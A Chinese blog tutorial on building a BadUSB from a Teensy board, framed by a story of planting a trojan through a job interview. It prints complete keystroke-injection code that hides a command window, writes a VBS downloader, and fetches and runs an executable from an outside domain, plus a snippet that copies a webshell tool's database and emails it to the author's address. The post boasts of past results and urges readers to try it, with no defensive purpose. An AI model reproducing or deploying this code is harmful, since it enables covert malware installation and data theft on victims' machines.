一个U盘你敢不敢让老农插

黑帽SEO培训第二期的最后,互相扯,扯到了某某黑客为了某外贸公司的数据,进行物理渗透。

道理很简单,就是直接应聘某外贸公司,然后应聘SEO,面试后基本外贸公司都是说直接就给你电脑,让你熟悉一下流程,于是你就有了机会触碰对方的电脑。

外贸公司大部分基本是一个局域网,当然,现在也有很多条网线,但是目前来说,还是同一部门同一局域网居多。

于是,该“黑客”就插入了自己特质的U盘。然后植入了后门木马。然后拍拍屁股跟对方说,我可能不适合做SEO,就走人了。

然后就是远程肉鸡上线,开始进行数据的进一步渗透获取。

今天普及下原理

刚好网上买了个开发板,顺便记录一下。

大佬们跑去找妹子了,只有老农回家带娃,顺便领了快递上楼。

快递包裹就是teensy的开发板

打算写好数据后,包装成U盘,到处”浪”

8.jpg

第一步,安装Arduino IDE

官网:https://www.arduino.cc/en/Main/Software

根据自己的系统,下载对应的版本,我的系统是WIN10,就安装了APP

打开界面如下

8.jpg

插入开发板

安装完IDE后,插入你的开发板,运行IDE即可

然后就是选择你的开发板,以及USBTYPE编入代码烧入

8.jpg

恶意代码

Github有很多的这类Playload

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

然后USB-Rubber-Ducky的payload翻译脚本

https://github.com/toxydose/Duckyspark

相关指令

python3 Duckyspark_translator.py [payload.txt] [output_file]

一般普遍用的代码

一般普遍用到的代码就是下载文件,运行。

然后其他的操作,直接通过病毒文件进行。

直接我直接用freebuf的一段代码,当然还有其他的代码

8.jpg

https://github.com/lr3800/teensy

int myKeyBreak = 50;

void setup() {
  delay(6000);
  omg("cmd.exe  /T:01 /K mode CON: COLS=16 LINES=1"); 
  delay(myKeyBreak);
  ascii_println("del x.exe");
  delay(myKeyBreak);
  ascii_println("echo strFileURL = \"http://www.affadsense.com/test.exe\" > K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo strHDLocation = \"x.exe\" >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objXMLHTTP.open \"GET\", strFileURL, false >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objXMLHTTP.send() >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo If objXMLHTTP.Status = 200 Then >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objADOStream = CreateObject(\"ADODB.Stream\") >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Open >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Type = 1 >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Write objXMLHTTP.ResponseBody >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Position = 0 >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objFSO = Nothing >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.SaveToFile strHDLocation >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Close >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objADOStream = Nothing >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo End if >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objXMLHTTP = Nothing >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("exit");
  delay(1000);
  omg("cmd /c cscript K8.vbs");
  delay(8000);
  omg("cmd /c del K8.vbs");
  delay(1000);
  omg("cmd /c x.exe");
  delay(10000);
}
void loop() {
}

void ascii_println(char *string)
{
  ascii_type_this(string);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}


void ascii_type_this(char *string)
{
  int count, length;
  length = strlen(string);
  for (count = 0 ; count < length ; count++)
  {
    char a = string[count];
    ascii_input(ascii_convert(a));
  }
}

void ascii_input(char *string)
{
  if (string == "000") return;
  int count, length;
  length = strlen(string);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.send_now();
  for (count = 0 ; count < length ; count++)
  {
    char a = string[count];
    if (a == '1') Keyboard.set_key1(KEYPAD_1);
    if (a == '2') Keyboard.set_key1(KEYPAD_2);
    if (a == '3') Keyboard.set_key1(KEYPAD_3);
    if (a == '4') Keyboard.set_key1(KEYPAD_4);
    if (a == '5') Keyboard.set_key1(KEYPAD_5);
    if (a == '6') Keyboard.set_key1(KEYPAD_6);
    if (a == '7') Keyboard.set_key1(KEYPAD_7);
    if (a == '8') Keyboard.set_key1(KEYPAD_8);
    if (a == '9') Keyboard.set_key1(KEYPAD_9);
    if (a == '0') Keyboard.set_key1(KEYPAD_0);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    delay(11);
    Keyboard.send_now();
  }
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

char* ascii_convert(char string)
{
  if (string == 'T') return "84";
  if (string == ' ') return "32";
  if (string == '!') return "33";
  if (string == '\"') return "34";
  if (string == '#') return "35";
  if (string == '$') return "36";
  if (string == '%') return "37";
  if (string == '&') return "38";
  if (string == '\'') return "39";
  if (string == '(') return "40";
  if (string == ')') return "41";
  if (string == '*') return "42";
  if (string == '+') return "43";
  if (string == ',') return "44";
  if (string == '-') return "45";
  if (string == '.') return "46";
  if (string == '/') return "47";
  if (string == '0') return "48";
  if (string == '1') return "49";
  if (string == '2') return "50";
  if (string == '3') return "51";
  if (string == '4') return "52";
  if (string == '5') return "53";
  if (string == '6') return "54";
  if (string == '7') return "55";
  if (string == '8') return "56";
  if (string == '9') return "57";
  if (string == ':') return "58";
  if (string == ';') return "59";
  if (string == '<') return "60";
  if (string == '=') return "61";
  if (string == '>') return "62";
  if (string == '?') return "63";
  if (string == '@') return "64";
  if (string == 'A') return "65";
  if (string == 'B') return "66";
  if (string == 'C') return "67";
  if (string == 'D') return "68";
  if (string == 'E') return "69";
  if (string == 'F') return "70";
  if (string == 'G') return "71";
  if (string == 'H') return "72";
  if (string == 'I') return "73";
  if (string == 'J') return "74";
  if (string == 'K') return "75";
  if (string == 'L') return "76";
  if (string == 'M') return "77";
  if (string == 'N') return "78";
  if (string == 'O') return "79";
  if (string == 'P') return "80";
  if (string == 'Q') return "81";
  if (string == 'R') return "82";
  if (string == 'S') return "83";
  if (string == 'T') return "84";
  if (string == 'U') return "85";
  if (string == 'V') return "86";
  if (string == 'W') return "87";
  if (string == 'X') return "88";
  if (string == 'Y') return "89";
  if (string == 'Z') return "90";
  if (string == '[') return "91";
  if (string == '\\') return "92";
  if (string == ']') return "93";
  if (string == '^') return "94";
  if (string == '_') return "95";
  if (string == '`') return "96";
  if (string == 'a') return "97";
  if (string == 'b') return "98";
  if (string == 'c') return "99";
  if (string == 'd') return "100";
  if (string == 'e') return "101";
  if (string == 'f') return "102";
  if (string == 'g') return "103";
  if (string == 'h') return "104";
  if (string == 'i') return "105";
  if (string == 'j') return "106";
  if (string == 'k') return "107";
  if (string == 'l') return "108";
  if (string == 'm') return "109";
  if (string == 'n') return "110";
  if (string == 'o') return "111";
  if (string == 'p') return "112";
  if (string == 'q') return "113";
  if (string == 'r') return "114";
  if (string == 's') return "115";
  if (string == 't') return "116";
  if (string == 'u') return "117";
  if (string == 'v') return "118";
  if (string == 'w') return "119";
  if (string == 'x') return "120";
  if (string == 'y') return "121";
  if (string == 'z') return "122";
  if (string == '{') return "123";
  if (string == '|') return "124";
  if (string == '}') return "125";
  if (string == '~') return "126";
  Keyboard.print(string);
  return "000";
}

void release_keys()
{
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

void send_keys(byte key, byte modifier)
{
  if (modifier)
    Keyboard.set_modifier(modifier);
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(100);
  release_keys();
}

void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
  ascii_type_this(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

烧入过程

8.jpg

点击验证

然后点击 上传

8.jpg

提示成功后,开发板的按钮点一下便烧入了。

8.jpg

这里说下我的菜刀数据获取代码


if (p.MainModule.FileName.Contains("caidao.exe")) { string s = p.MainModule.FileName.Replace("caidao.exe", "db.mdb"); File.Copy(s, s.Replace("db.mdb", "cd.mdb"), true); Sendmail("admin@affadsense.com", "菜刀来了", s.Replace("db.mdb", "cd.mdb")); }

通过经常判断caidao.exe的路径,然后复制菜刀的数据文件并发送到邮件。

你的菜刀没打开获取不到?

后台不停的间隔判断进程是否有caidao.exe即可。

秀当初的战果

8.jpg

8.jpg

就到这里了

分享的很简单,没什么技术含量,基本等于水文。

这种Badusb的制作还是很简单的,可以做很多的事情。有兴趣的,可以淘宝买买便宜的开发板,玩一下。

image

码字不易,您的转发和赞赏是我的一大动力之一。

欢迎关注我的公众号,请爱护我,不要抄袭我。

image

欢迎加入我的论坛,与我们一起交流。

下面是加入小密圈/获取论坛邀请码购买渠道:

小密圈(入圈后私信圈主,看到会私信邀请码):

image

其他获取方式:

支付宝:image

微信支付:

image